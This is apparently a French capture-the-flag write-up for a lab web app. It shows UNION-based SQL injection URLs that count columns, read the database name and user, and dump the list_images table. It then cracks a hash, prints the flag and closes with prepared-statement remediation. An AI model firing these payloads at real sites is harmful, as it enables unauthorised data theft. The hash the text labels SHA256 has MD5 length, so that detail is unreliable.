SQL INJECTIONS UNION (Images)

Identifier les colonnes affichables :
http://192.168.10.22/?page=searchimg&id=1+ORDER+BY+2--&Submit=Submit#
 
Extraire la base de données :
http://192.168.10.22/?page=searchimg&id=5+UNION+SELECT+database(),user()--&Submit=Submit#

http://192.168.10.22/?page=searchimg&id=5+UNION+SELECT+url,comment+FROM+list_images--&Submit=Submit#
 
En SHA256 1928e8083cf461a51303633093573c46 donne albatroz
 
echo -n "albatroz" | sha256sum
 
FLAG => f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188

=======================================================================================================================================================
REMEDIATION :

Protection contre les Injections SQL (Union & Error-based)
Le risque ici est que la saisie de l'utilisateur soit interprétée comme une commande par le moteur de base de données.
-	Requêtes Préparées (Prepared Statements) : C'est la solution ultime. En utilisant PDO, nous séparons la structure de la requête SQL des données. 
Le moteur SQL compile la requête d'abord, puis insère les données comme de simples paramètres. Même si l'utilisateur tape UNION SELECT, cela sera traité comme une simple chaîne de caractères et non comme une instruction.

Utilisation de marqueurs anonymes pour garantir l'étanchéité
$stmt = $pdo->prepare("SELECT username, email FROM users WHERE id = ?");
$stmt->execute([$_GET['id']]);
$user = $stmt->fetch();
